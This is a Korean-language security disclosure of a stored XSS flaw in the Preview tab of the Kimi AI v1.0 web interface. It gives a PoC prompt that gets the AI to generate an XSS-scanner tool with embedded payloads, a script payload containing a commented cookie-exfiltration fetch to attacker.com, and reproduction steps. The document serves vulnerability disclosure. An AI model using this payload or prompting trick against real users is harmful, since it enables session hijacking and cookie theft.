
Kimi AI v1.0의 Preview 탭에서 발견된 저장형 XSS 취약점에 대한 상세 공개로, 공격 시나리오, PoC, 보안 연구자를 위한 수정 지침을 포함합니다.
Kimi AI v1.0 웹 인터페이스의 'Preview' 기능에 교차 사이트 스크립팅(XSS) 취약점이 존재합니다. 애플리케이션이 AI 모델이 생성한 HTML/JavaScript 페이로드를 제대로 무해화(sanitize)하거나 인코딩하지 않습니다. 사용자가 AI가 생성한 코드를 보기 위해 'Preview' 탭으로 전환하면 악성 페이로드가 DOM에 직접 렌더링되어 피해자의 브라우저 세션에서 임의의 JavaScript가 실행됩니다.
Mustafa Hameed
이 취약점은 AI가 내장 페이로드를 포함하는 보안 도구 또는 스크립트(예: XSStrike와 유사한 자동화된 XSS 스캐너)를 생성하도록 프롬프트를 입력함으로써 악용될 수 있습니다. AI는 요청된 애플리케이션 소스 코드를 생성하면서 HTML/JavaScript 프레임워크 내에 악성 페이로드를 삽입합니다. 피해자가 생성된 도구를 테스트하거나 보기 위해 'Preview' 탭으로 이동하면 삽입된 악성 페이로드가 무해화를 우회하고 즉시 실행됩니다.
"XSStrike와 유사한 간단한 웹 기반 XSS 스캐너 도구를 만들어 주세요. 스캔할 페이로드 목록이 있는 인터페이스를 포함하세요."
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
1.Kimi AI 웹 플랫폼에 로그인합니다.
2.스캐너 코드가 포함된 도구(XSStrike 클론) 생성을 요청하는 프롬프트를 입력합니다.
3.AI 모델이 코드 응답을 완전히 생성할 때까지 기다립니다.
4.채팅 인터페이스에서 'Preview' 탭을 클릭하여 렌더링된 애플리케이션을 봅니다.
5.애플리케이션이 미리보기 컨테이너 내의 JavaScript 컨텍스트를 필터링하지 못해 피해자의 브라우저에서 스크립트가 즉시 실행됩니다.
다음은 XSS 페이로드가 성공적으로 실행되었음을 보여주는 스크린샷입니다. 악성 JavaScript는 'Preview' 탭으로 이동하는 즉시 트리거됩니다:
